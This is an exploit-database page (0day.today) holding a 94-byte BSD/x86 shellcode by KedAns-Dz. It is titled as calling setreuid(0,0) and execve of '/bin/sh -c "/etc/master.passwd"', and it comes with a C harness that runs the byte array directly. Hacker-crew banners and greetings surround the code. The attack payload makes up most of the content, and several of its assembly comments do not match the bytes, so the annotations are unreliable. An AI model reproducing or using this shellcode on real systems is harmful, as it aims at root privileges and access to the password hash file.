[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

bsd/x86 execve ('/bin/sh -c "/etc/master.passwd"') setreuid(0,0) 94 bytes

Author
KedAns-Dz
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-17384
Category
shellcode
Date add
15-01-2012
Platform
bsd/x86
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm KedAns-Dz member from Inj3ct0r Team                1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

/*
###
# Title : bsd/x86 execve ('/bin/sh -c "/etc/master.passwd"') setreuid(0,0) shellcode - 94 bytes
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com (ked-h@1337day.com) | ked-h@exploit-id.com | kedans@facebook.com
# Home : Hassi.Messaoud (30500) - Algeria -(00213555248701)
# Web Site : www.1337day.com * sec4ever.com * r00tw0rm.com
# Facebook : http://facebook.com/KedAns
# platform : bsd/x86
# Type : Shellcode - 94 Bytes
# BSD's : FreeBSD , OpenBSD , DragonflyBSD
###

##
# | >> --------+++=[ Dz Offenders Cr3w ]=+++-------- << |
# | > Indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3   |
# | Jago-dz * Over-X * Kha&miX * Ev!LsCr!pT_Dz * Dr.55h |
# | KinG Of PiraTeS * The g0bl!n * soucha * dr.R!dE  .. |
# | ------------------------------------------------- < |
##

*/

#include <stdio.h>

char sc[] =
"\x31\xC0"        // xor %eax,%eax
"\x50"            // push %eax
"\x50"            // push %eax
"\x50"            // push %eax
"\xB0\x7E"        // mov %al,$0x7E
"\xCD\x80"        // int $0x80
"\x6A\x3B"        // push $0x3B
"\x58"            // pop %eax
"\x99"            // csq
"\x52"            // push %edx
"\x68\x2D\x63\x00\x00"    // push $0x632D
"\x89\xE7"         // mov %edi,%esp
"\x52"             // push %edx
"\x68\x6E\x2F\x73\x68"    // push $0x68732F6E
"\x68\x2F\x2F\x62\x69"    // push $0x69622F2F
"\x89\xE3"         // mov %ebx,%esp
"\x52"             // push %edx
"\xE8\x20\x90\x90"    // call me
"\x2F"             // das
"\x62\x69\x6E"     // bound %ebp,qword %ecx $0x6E
"\x2F"             // das
"\x73\x68"         // jnb short me
"\x20\x2D\x63\x20\x22\x2F"  // and $0x2F222063,%ch
"\x65\x74\x63"     // je short me
"\x2F"             // das
"\x6D"             // ins dword %edi,%dx
"\x61"             // popad
"\x73\x74"         // jnb short
"\x65\x72\x2E"     // jb short
"\x70\x61"         // jo short
"\x73\x73"         // jnb short
"\x77\x64"         // ja short
"\x22\x00"         // and %al,%eax
"\x57"             // push %edi
"\x53"             // push %ebx
"\x89\xE1"         // mov %ecx,%esp
"\x52"             // push %edx
"\x51"             // push %ecx
"\x53"             // push %ebx
"\x50"             // push %eax
"\xCD\x80"         // int $0x80
"\x31\xC0"         // xor %eax,%eax
"\x50"             // push %eax
"\xB0\x01"         // mov %al,$0x01
"\xCD\x80";        // int $0x80

int main()
{
    int (*dz)() = (int(*)())sc;
        printf("bytes: %u\n", strlen(sc));
        dz();
}

#================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]=====================================
# Greets To : Dz Offenders Cr3w < Algerians HaCkerS > || Rizky Ariestiyansyah * Islam Caddy ..
# + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re * CrosS (www.1337day.com) 
# Inj3ct0r Members 31337 : Indoushka * KnocKout * SeeMe * Kalashinkov3 * ZoRLu * anT!-Tr0J4n * 
# Angel Injection (www.1337day.com/team) * Dz Offenders Cr3w * Algerian Cyber Army * Sec4ever
# Exploit-ID Team : jos_ali_joe + Caddy-Dz + kaMtiEz + r3m1ck (exploit-id.com) * Jago-dz * Over-X
# Kha&miX * Str0ke * JF * Ev!LsCr!pT_Dz * KinG Of PiraTeS * www.packetstormsecurity.org * TreX
# www.metasploit.com * UE-Team & I-BackTrack * r00tw0rm.com * All Security and Exploits Webs ..
#================================================================================================



#  0day.today [2024-11-16]  #